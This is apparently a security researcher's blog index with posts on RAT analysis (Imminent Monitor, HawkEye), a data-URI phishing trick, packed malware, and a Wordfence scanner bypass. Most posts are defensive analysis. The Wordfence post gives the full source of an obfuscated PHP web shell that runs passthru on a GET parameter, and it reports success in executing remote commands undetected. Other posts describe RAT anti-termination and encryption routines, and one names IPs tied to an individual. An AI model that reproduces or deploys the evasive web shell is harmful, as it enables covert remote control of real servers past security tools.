Poor Mans Malware – HawkEye Keylogger Reborn

May 27, 2016

I was notified of a recent sample which has been dubbed as a “reborn” version of Hawkeye Keylogger. The developer in question repeatedly shows poor understanding of web application security and lacks any real innovation in keylogger malware. Despite this many decide to purchase this malware for many reasons. Many different users have taken on the project of ‘Hawkeye’, the latest is a malware developer who created the quite laughable ‘iSpy’ software.

Hash – SHA256 :

61538417c49d4ec8a94c974b4a785ca8b4f1a89df0934ef1f6ed38b6587e445e

read more …

RAT Threat Intelligence – A Very Simple Manual Technique

April 15, 2016

While I’ve been looking further and further into remote administration tools I decided to step back for a moment and look it from a general point of view. I’ve been focusing on three RAT’s at the moment; Imminent Monitor, Nanocore and Luminosity Link. These are advertised on a US forum and discussed on english speaking forums, although distributed around the world, the main audience for these are western developed countries.

I looked into YouTube and made some queries, I set the queries to be filtered to a month so I know what’s recent. Some of videos relating to the RATs were not relevant to the software in question, but I can’t filter out all of it. It should be looked at a general point of view, and most of the discrepancies were from the small portions of the research, which we won’t be focusing on. The idea for looking into what’s being discussed on YouTube is that it gives some insight onto trends. For example, PoisonIvy, a very dated RAT isn’t discussed too much on YouTube anymore with just 88 counts of videos in the past month. While njRAT is the clear leader of what is being discussed on YouTube, the content uploaded is usually from eastern countries like Syria, Egypt and Turkey (not exclusively).

stats-youtube-upload-april-2016

The amount of video content in March 2016

Statistics:

NjRAT – 1,560
darkcomet – 771
blackshades – 22
netwire – 3
luminositylink – 11
nanocore – 48
babylon rat – 393
cybergate – 133
xtreme rat – 379
poison ivy – 81
bozok – 8

 

A large portion of these videos are in Arabic, and give some insight into other countries around the world and what is relevant to them. It is noteable that many of the videos uploaded from eastern countries point to Facebook profiles or Skype contacts that provide further information about the individual, some of these obviously won’t be sophisticated attackers. As well as corporate security I am also interested in individual’s security and so this is still relevant, many videos uploaded about RATs leak out information about the uploadee or the clients they hold. For example an Arabic video explaining njRAT surfaced on YouTube on the 21st March, he first explains about a VPN and goes through various steps to finally created a dynamic host. lala123.no-ip.biz, correlating IP is 141.255.153.33 which is the VPN’s IP (Hostname: 33-153-255-141.dynip.ipjetable.net).

aFurther on into the video we find that he uses the NO-IP client and spills some of his previous names his used with NO-IP, one of them being MAF12.no-ip.biz, this correlates to a different IP (105.102.78.97) which is owned by an Algerian telecom. While we can’t make too many assumptions, the probability of that being his IP is quite high. We can learn other things about malicious software from YouTube as well, although RATs are more commonly shown than other forms. There are ofcourse many other streams of information available on the internet, some more accurate and concise.

bI can take a few things from this information. Attackers are still using very outdated, broken, ill-featured software and is distributed widely for further usage, especially in eastern countries. Remote administration tools trickle down if they are free but are rarely used if they are ‘premium’ RATs, even if they are cracked. Even though remote exploits have been found for Darkcomet, users still persist in keeping Darkcomet alive, most likely because it’s well known for being free.

There are ofcourse exceptions and maybe even contradictions from the statements I’ve made, but researching on YouTube is an essential threat intelligence tool in my eyes as attackers become older and remember the tools they’ve used before. YouTube is a platform where users can learn about such tools without breaking through the barriers of forums or extensive searches.

 

That’s all from me, thanks for looking.

Imminent Monitor 4 RAT Analysis – Further Into The RAT

March 1, 2016

My last post got a very positive response which is great, I actually had an interesting talk with the author who graciously gave me a license to analyse the remote administration tool. The user proceeded to tell me any licenses who use the tool maliciously will be banned, and the primary purpose is for system administration (Internet Cafe etc.). Note: Class names and method names are translated from de4dot character deobfuscation.

The cracked version has a lot of broken features and is partly deobfuscated in the first place, this gives AV’s and defence providers a positive as it’s much easier to detect. The original version has some normal tricks to start off with, involving LZMA and XOR. But first, from the builds that I’ve seen Imminent has some static methods which allow us to know that this is Imminent. It gives us a hello message. Other methods have their characters obfuscated in the <module> but notice has a “Hello”.

aImminent has 3 resources which will be used for unpacking, a combination of LZMA and XOR are used as I said. A interesting algorithm popped up again which I talked about in the last article. I didn’t deobfuscate the characters this time so it looks a little crazy but it’s essentially the same thing.

bThis operation is used before it decompresses a resource file using LZMA. The key is different to the other one I stated in my earlier article. The key this time is !!@@##$$%%^^&&**(())__++  this brings a obfuscated binary which can have it’s characters substituted in de4dot much like the original binary. Extracting the config for the particular build is a little bit challenging and involves <Module>.byte_0 which is commonly referenced through the assembly. The image does not show all the methods that use byte_0.

cA large amount of unsigned integers are used which I suspect are used towards the configuration. They drastically change in each build, and config decryption has many methods in amongst one another. It is assigned with the use of smethod_29, this method is where it tranforms unsigned integers into a readable config. The main method inside smethod_29 is method_4, which after being run shows us the config in all it’s glory. Incidently this also used as well for an executable which will look at in a moment.

eWe can see a lot of things in the config such as the host, startup entries and mutex. One of the interesting things we should look for while conducting an analysis is the build settings and version. The build settings are nicely formatted together making it easy to read and the version is very obvious to see, the above image is 4.2.

The assembly that also uses smethod_29  references all the dll’s IM needs for more of it’s advanced operations. Calls to an injector, lzloader, video and client plugin are within the resources of a decrypted binary after using smethod_29.

f

One protection mechanism the RAT makes is to ensure the process is made critical, if the process is to be terminated, denial of termination is made or a blue screen arrives to the user. The blue screen would like something like this, and would occur straight after the termination of the process.

h

The components for this are in “class10” which import some API’s to achieve this operation in c#, it’s not a new technique and can be found in a lot of RAT’s to keep it unkillable. dll’s imported are kernel32.dll for getCurrentProcess, advapi32.dll for GetKernelObjectSecurity and SetKernelObjectSecurity also ntdll for NtSetInformationProcess. NtSetInformationProcess is an undocumented function in Windows and can be used to make the process appear as critical. Any executable downloaded from the internet using this API should not be run until further analysis.

Imminent Monitor is easily identifiable as it spits out some simple unique strings. It has a vast amount of functionality such as torrenting, reverse proxy, remote desktop, keylogger and so on. Imminent prints this out to itself, because of the amount of items saying ready, we can create a signature to say if all of these strings are in memory, it is more than likely malware and is Imminent. We can also use this strings to identify what class is what function. I would advise sysadmins and malware researchers to use these strings for YARA rules and such, they are unique and have quite a large amount of them, “Ready” strings.

i If you wish to be protected from IM cracked or original, it is by far hard. I’d like to thank @MalwareHunterTeam for the swathe of samples recieved which allowed me to see the malware from a much broader picture. It seems looking into RAT’s this year has been fairly successful and I hope it continues.

Imminent Monitor 4 RAT Analysis – A Glance

January 23, 2016

As I stated in this video I’m going to be focusing much more on RAT analysis. My reasons are given in the second portion of the video for anyone who is interested. I decided to look at a fairly popular RAT called ‘Imminent Monitor’. I downloaded the cracked version which many should note as this may differ from the original in some ways, I’ve tried to only include things which I’m sure are wrong with the original as well. There is something positive about analysing cracked malware, as the majority of criminals probably don’t want to pay for RAT’s.

Darkcomet RAT is still actively used today even though it is no longer developed and has been proven to have exploits in this. With this in mind, this version of cracked software will most likely distribute around the internet and be used more than the paid version due to it simply being free. I thought I was going to have a fairly long wait to find how to extract the config out of the RAT but it was really as easy as 1-2-3. Literally looking at the first classes constructor.

1I was able to see port, ip/hostname, startup key, startup name, startup location, mutex and version (and other less important things).

2One of the first threat indicators I can provide to malware guys is that Imminent RAT creates a folder which is always the same, it is quite unique. It creates a directory called “Imminent” in the application data of the current user. This does not hold the executable but instead holds information to be sent over to the client. Like logs.

3The binary uses cases to make it harder for researchers to make out whats going. Imminent uses a XOR like function but to what I see isn’t exactly XOR. I’m thinking of creating a deobfuscator for this sort of code later on, but for now I solved it manually, which wasn’t particularly challenging. The more I look at it the more it looks like XOR, but I’m terrible at checking these things so I’m just going to call it XOR-like.

4This XOR like functions is used to encrypt logs and other parts included in the “Imminent” application data. I successfully tested my algorithm against the original and got the same result, this was also verified by breakpointing the function to where it was encrypting to make sure the plain text was the same.

aWith the same algorithm we can decrypt logs that Imminent creates. It does it by a format of month/day/year, showing the author could be American origin. An interesting thing about the use of what looks to be XOR is the key provided for the operation, the developer decided to use “sampleKey”. Or did he? A person who doesn’t copy and paste an algo usually chooses a different key than sampleKey, infact someone who does copy and paste an algorithm usually changes the key.

       byte[] path = System.Text.Encoding.UTF8.GetBytes(“C:\\Documents and Settings\\L!NK\\Local Settings\\Application Data\\Startup Folder Name\\MyFile.exe”);
byte[] pass = System.Text.Encoding.UTF8.GetBytes(“sampleKey”);
byte[] ax = xorlike(path, pass);
System.IO.File.WriteAllBytes(“out.txt”, ax);

 

        public static byte[] xorlike(byte[] byte_1, byte[] byte_2)
{
byte[] result;

int num = 11;
int num5 = 13;
int num3 = 257;
int num6 = byte_2.Length – 1;
for (int num7 = 0; num7 <= num6; num7++)
{
num3 += num3 % (int)(byte_2[num7] + 1);

}
int num4 = byte_1.Length – 1;
for (int num2 = 0; num2 <= num4; num2++)
{
num3 = (int)byte_2[num2 % byte_2.Length] + num3;
num = (num3 + 5) * (num & 255) + (num >> 8);
num5 = (num3 + 7) * (num5 & 255) + (num5 >> 8);
num3 = (num << 8) + num5 & 255;
byte_1[num2] ^= (byte)num3;
}
result = byte_1;
return result;
}

I’ve decided to show an example of it’s operation. You can use this for any defense against Imminent if you choose to make one. The code is obviously deciding to encrypt the startup path and saved in the Imminent folder as “Path.dat”, a rough location of a user is also saved “Geo.dat”, which uses a site called iptrackeronline.com to longitude, lattitude, city and finally country.

I discovered a file which deals with processes, I’m not sure at the moment, if its the file updater, download and execute or persistence. I’m more leaning towards it being a process watchdog but have many things to explore. I discovered it here:

aTurns out there is a base64 string which is then decompressed using the LOADLZ library it has with it. There’s a reason why this thing can be 400kb.

bThe file was written in C++ which is interesting as most .NET malware doesn’t drop anything like C++, turns out to be a dll which I assume is injected for persistence, although as I say I don’t want to rule out anything yet.

dI couldn’t debug in Immunity properly because I use an XP machine with some of the C++ redistributables not installed. This file required GetModuleHandleEx which was provided in 2011 from my research, but I might be wrong.

eI’m not going to show a lot of IDA, but it checks for a debugger, creates a thread, opens processes and creates them too. It is also uniquely identifiable because of some of the strings that are given. That is indeed a md5 hash which is “killswitch” in plain text.

immprochandleYou can see that correctly, the file is also FUD and still is as I write this article 3 days later.

I was starting to test out how I could break Imminent Monitor as well and found that the RAT does not like showing files when a file is out of its format, I named a file in the keylogger file “ao” and entered a small amount of data. It proceeded to not show any of the keylogging files that were available to it. This is it in a broken state.

5This is it in the normal state.

6The task manager disabler functionality that Imminent provides is also quite bad. It simply executes the task manager and makes it invisible. Not exactly to rootkit standards, but I guess does the trick to the average joe?

hidetaskIn the cracked version the process protection is broken or non-existant, I am able to kill the process with ease. I am to do more research on Imminent Monitor, it’s been fun to look at so far and I haven’t looked through all of it because of time constraints in my life. What I have provided is some threat indicators for AV’s so that this RAT can be removed from peoples computers with ease, even if crypted. The static path declaration provides an opportunity to remove this RAT from most machines.

I’ve been looking more at how Imminent can be broken remotely, I’ve had a few sucesses with random things, but must look at them in more depth before I decide to release them publicly. A reminder for anyone reading this, if you have an original build that isn’t from a cracked client, I would like to have it so please contact me.

 

Thanks for looking.

Utilising Data URI’s Functionality For Phishing Attempts

January 18, 2016

Remember a time where people said you should look at the address bar to verify whether or not it’s a phishing attempt? A friend of mine recently got an email which is fairly interesting to me. This attack provides a decent amount of SE to make a user think it’s a legit, correct, the green “padlock” isn’t there, but google.com is.

phishing

It all started with a email which looked to be fairly normal, the one problem with it is ofcourse is the Google attachment. I don’t use Google as a provider for this email and so having a Roundcube email client and Google attachment doesn’t work out. The attackers are just taking into account the majority of people will be using Google accounts and so it’s worth making something look like this.

aThe problem is that it’s an image and it goes to somewhere which isn’t Google, I can see this by viewing the source of the email.

bThe URL is redirected twice until it reaches its destination, pretty common with phishing attacks most likely so they can dynamically redirect if a site is reported on and falls down. The code here refreshes and uses the data: functionality that browsers have available. There are spaces from the google.com text to the <script> tags, this is to ensure that the browser shows only the Google text in the URL bar, making it deceptive to most people. The text in the URL isn’t actually the location, but infact code itself.

cThe phishers use a very simple Javascript obfuscator for their code, replacing eval with alert will provide you a insight into the code they have made. The obfuscator itself also shows the strings so you can almost guess without deobfuscating what’s going on. Poor show boys.

dFinally the code is resolved as a simple iframe which simply copies the Google code and ensures it’s sent to 1.php, a fairly normal name for a form phishing attribute, they are usually very lazy.

eThe final result? You’ve already seen it but it’s rather convincing to a person who isn’t to confident with computers. Maybe we need to have a look at modifying how data URI’s are used. Here’s a video showing it live.

Jumping The Fence – How Detecting Malicious PHP Files Isn’t That Easy.

December 22, 2015

Introduction

First of, I’d like to say that Wordfence have a pretty cool product and most people who intrude into someone’s server won’t take this much effort to hide themselves. Most hackers who upload PHP shells usually just stick with a generic one they’ve downloaded from a super priv8 hacker forum. Still, this shows how trivial it can be to bypass some systems.

Signatures Never The Answer

For those of you who don’t know what Wordfence is, it’s a leader in it’s field, a security plugin for WordPress which boasts over a million installs. This post doesn’t talk about how a PHP file has come onto the system, be it a vulnerable plugin or another part of the website, this is more on the detection of malicous files. Malicous script detection is a mammoth task, but is made easier by some hackers who simply upload they’re shell which is base64’d and eval’d. The way I evaded detection would primarily be used if the target was especially valuable, such as a government wordpress site or a multi-million pound company. Also take into account other security mechanisms that an administrator may put in place, this is no ‘oh shit’ moment.

That said I was able to bypass in under an hour, I suspect mostly because it relies on signatures that have previously been marked as malicous, which is great, but isn’t as effective as some may think when ‘professionals‘ wish to stay on the server. At first I simply tried something like this:

pAssThRu($_GET[‘x’]);

Some detection systems have problems understanding the capatalisation of letters and so I thought this would be a good start, passthru works much like the exec or system function. To my knowledge exec and system are used more often and so I wanted to test out to see if all functions are found as malicous, indeed this was the case. I then tested with a few web shells that I had which were obfuscated in various ways, shells like C99 or WSO for those interested, they were also detected successfully.

I then noticed that the eval function was not intially flagged up as malicous activity, which is perfectly right, because many web applications may need this function for purposes that aren’t malicious. I then looked at how I could trick or atleast have something that was a little different from other obfuscators/malicious code. I thought that manipulating the strings in certain way was a good way to start, but did not attempt to involve the functions base64_decode or gzdeflate, as the combination of these and eval would surely flag something up (although I haven’t tried, give it a go?).  I first brought some filler variables into the mix, this is quite common in exploit kit code and executable crypting, where the variables are either blank or are never used to make the code seem legitimate.

$a = “”;
$b = uniqid();

I then declare variables for later use, I would use str_shuffle to shuffle the characters around, but it wouldn’t matter because it would bring the output whatever I did, it is almost a form of primitive polymorphism.

$a = “aA”;
$se = “sS”;
$b = “bbBbBb”;

The b’s were filler like the above code, it was never going to be used, but $a and $se would, as the characters ‘a’ and ‘s’ are in the function passthru. The main aim of my code is to have the eval function basically call the first code passthru($_GET[‘x’]), but in a different way. With the the next two lines I decided to start using english sounding names to make it look less generated or obvious. I used the metaphone function to get some of the characters used in the code, in this case ‘t’ and ‘p’.

$tea = metaphone(“0-ttttttt-ttttt”);
$patrol = metaphone(“………..p”);

I then used the strip_tags function to get the combination ‘hr’ and ‘u’. Very simple function that probably hasn’t been used for malicious purposes like this before, what I was really trying to achieve was a completely unique payload.

$ru = strip_tags(“<a>hr</a>”);
$uare = strip_tags(“<b>u</b>”);

I then resorted to using the chr function which corresponds with ASCII, which I used for some of the characters like [ ] () and ‘, I later used some basic maths to get values with the chr function to add some difference to them.

$cake = chr(40);
$biscuit = chr(41);
$coffee = chr(36);
$family = chr((80+1)  + (8 * 1) + (1+1));
$tree = chr((70+11)  + (8 * 1) + (1+3));
$bark = chr(40-1);

I concatenated the first few variables to make the function which made it look like this:

bI then included the remaining parts into an array like so:

cAll I had to do after this is simply put all of the variables in the right combination to make this work which was:

eval($bench.$park[0].$park[2].$park[3].”ET”.$park[4].$park[6].”x”.$park[6].$park[5].$park[1].”;”);

With this code I could now successfully execute some commands remotely. Like so:

dI scanned with the latest version of Wordfence and it found no malicious scripts. SUCCESS!

aFull code:

<?php
$a = “”;
$b = uniqid();

$a = “aA”;
$se = “sS”;
$b = “bbBbBb”;
$tea = metaphone(“0-ttttttt-ttttt”);
$patrol = metaphone(“………..p”);
$ru = strip_tags(“<a>hr</a>”);
$uare = strip_tags(“<b>u</b>”);
$cake = chr(40);
$biscuit = chr(41);
$coffee = chr(36);
$under = strip_tags(“<p>_G</p><i>”);
$family = chr((80+1)  + (8 * 1) + (1+1));
$tree = chr((70+11)  + (8 * 1) + (1+3));
$bark = chr(40-1);

$bench = ($patrol.str_shuffle($a[0]). str_shuffle($se). $tea[0]. $ru. $uare);

$park = [$cake, $biscuit, $coffee, $under, $family, $tree, $bark];

eval($bench.$park[0].$park[2].$park[3].”ET”.$park[4].$park[6].”x”.$park[6].$park[5].$park[1].”;”);
?>

Conclusion

The most popular security system for WordPress was unable to identify the malicous code I created, It is rather hard to differentiate with PHP what is malicious and benign as shown here, even if code analysis is used as advertised by Wordfence. UnPHP was unable to handle how I was obfuscating my script as well. It’s not of upmost importance, as many hackers don’t go past the norm with PHP shells, but it is something to think about.

Old Tricks Die Hard, Malwares No Exception (Part 1)

October 26, 2015

I haven’t updated this blog with some malware analysis for a little while, nothing interesting has come to my attention really, I do only have a limited field of view too as I am a student and not an AV. I found this peice of malware that I am about to show a little funny, some simple tricks that malware authors use that they just can’t shake off, one of them being the use of UPX. And yes, this did have a digital signature with it.

aI don’t exactly know the origins of this file as I got it from a malware sample website, I don’t think this could pass off as an Email client from Microsoft, but that’s just me I guess? 🙂

bSo I unpack the UPX file and look at the resource section of the executable. I find a value called “KIT” which has what seems to be some other packed or encrypted data. What I find out is this is a DLL file.

cI survey what imports this peice of malware has in IDA I then use Immunity to debug the application, looking at the executable in the debugger I can see that CreateProcessA is going to be used. I breakpoint here to see what’s being created and find that a simple command line arguement is being used to launch the same process with just the additional arguement. The arguement is funnily enough called “launch”.

eRunning through the program a little bit until we get to an interesting part where the register shows the all too common “PE” string right before allocating some memory. I follow to the dump to see what is there and am shown what seems to be a exe or dll. Remember the “KIT” that we saw a few pictures back? Seems like we’ve found the unpacked version here.

fI select all from the dump and save to file, I can edit it later with a hex editor (HxD) to take out the parts that aren’t to do with the DLL. The DLL is initially packed with UPX which is obviously again, trivial to unpack. A little look at my trusty Exeinfo confirms it is indeed a DLL we have extracted. As we can see the malware has used UPX quite a lot, this is mostly because it wants the smallest size possible for it’s executable and DLL. I’ve said this before on the blog, UPX can bring detections to an executable and so a user would have to crypt which would probably inflate the file again. Ah, the problems of malware hey? I’d also like to say that the exe name wasn’t the malware authors choice, that was me who named it simply “ok.exe”, I’m imaginative I know.

gAnother easy trick that the developer has done is implement base64 to make sure some strings are obfuscated somewhat, as we all know, base64 is also quite trivial to decode. Most of the strings were API’s, they also base64’d the dll’s they were to import too. Funnily enough, the server ip to send information to wasn’t encoded or encrypted in any way, which I guess is fine. Most likely so researchers and AV’s can’t see the imports straight away.

hA short little loop to decode the base64 strings which is shown here after adventuring into the DLL a little bit.

iA little after we have found and decoded all the strings we need to load the decoded DLL’s so we can call the API’s and get down to business. A similar sight for anyone who has looked at malware before.jWe begin to start putting stuff into buffers seems like we’re going to create a file with some information and contact home soon,  we’re wsprintfa heavily in this section of the code. The host seems to be down, I don’t know how fresh the samples are.

kThe malware checks if a file called test.1 is available at C:\ which it won’t and then proceeds to search files in the directory it’s currently in, it also goes and attempts to adjust it’s token privileges allowing it to have more control. It will then create a mutex with a M contactenated with the IP address and port it is supposedly going to connect to, a bit different.

lIt has also been checking for Readme.txt in the directory and eventually creates a randomised folder name as shown here. This is where I’m guessing the malware will choose to reside and check again whether it has a running instance already on the computer.

mWhen I mean random there is nothing random on a computer, essentially it is though. Here I show the function the malware uses to create directories and files. It has an interesting pool of characters to choose from, I’ve simply highlighted a loop for you, the pool is very different from others you may see.

oIt proceeds to create what seems to be randomised folder names and finally creates the file Readme.txt, it then moves the exe from it’s original location to here. It has changed the folder “vv71” attributes to hidden, like most malware, so it’s harder to find. After it’s moved all the files, it wishes to sleep for 5000ms, this is quite common in malware as AV’s may pick up suspicous activity and begin to monitor it. After this, it launches the process in it’s new location to verify it’s made it, after it can verify all this, it will begin to start using the good ol’ WSA_STARTUP.

qWe obviously need some information we want to send back home and one of them is the version of the operating system. Interesting to see how low this malware had on it’s list such as NT and 2000.

rThe malware creates threads and sets the timeout as infinite which is annoying, there is no response as the ip is dead so it is a bit of a job modifying all the values allowing me to carry on analysing this. But almost all of the techniques used in this malware are very simplistic, although written in C++, this may be the developers first or one of the first peices of malware written.

sIn the threads there is one function which is seperate to the base64 function we looked at previously, it ends up being a common registry value for the startup. From what I can see, this particular strand of malware only creates one startup registry key.

tA really interesting part of  this malware is that it may of originally of exploited predominantly Japan, it ends up attempting to redirect a few .jp domains to a different IP. Although it’s placed in a different file from the original etc/drives/host file, so cannot confirm, it seems this is what the intended behaviour is though.

uvThat’s all I have time for now, interesting to see the differences in malware and techniques, but in this particular strand, it seems like the old tricks die hard. Very generic.

FighterPOS – DIY Malware

August 8, 2015

I would first like to credit TrendMicro with their initial research on FighterPOS. There have been an emegerence of new domains for FighterPOS recently and I discovered a whole load of other possible domains that could be used for the command and control. This particular peice of malware uses a open source VB6 peice of malware called ‘vnLoader’. The author of FighterPOS has either got himself or asked someone else to create a modified version to use as POS malware.

read more …

Surveying CodeCanyon Scripts – XSS, LFI, SQLi & More

August 2, 2015

Introduction

Have a job for me? Check my about page for contact.

CodeCanyon is a well known marketplace for code such as PHP scripts. I’ve taken a little of my time this week to check through “new” items coming through as well as some popular and random scripts. I decided I would not do an extensive penetration test on each script, simply see how fast I can find a vulnerability from each script. I didn’t take any longer than half an hour on any script I chose to look at. In total I found 17 vulnerabilities, without any use of scanners or any automated tools, this was simply me and the browser.

read more …

Bypassing Client Side Adblock Protections

July 30, 2015

I recently have been seeing similar messages from various stream providers that look like this. An intriguing message that tells you the stream provider has identified you are running the adblock extension and that you should unblock them to have full features. This is a fair enough response as most stream providers make their money from advertisments, but is trivially bypassed.

a

We can use inspect element to fully understand whats going on, one of the biggest identifiers is the word mask, which makes me want to investigate this further. Looking at the CSS elements, I can change various values.

bI changed the width which directly affected the message as we can see below.

cThe mask id has an attribute which if disabled, allows us to view normally. position:absolute. A very simple CSS trick to stop normal viewers from keeping adblock on. But developers for adblock could easily bypass such protection, there needs to be a server side aspect to this adblock protection to be effective in getting adblock viewers to see adverts. Client side protection is useless, because ofcourse, it’s client side.

d

e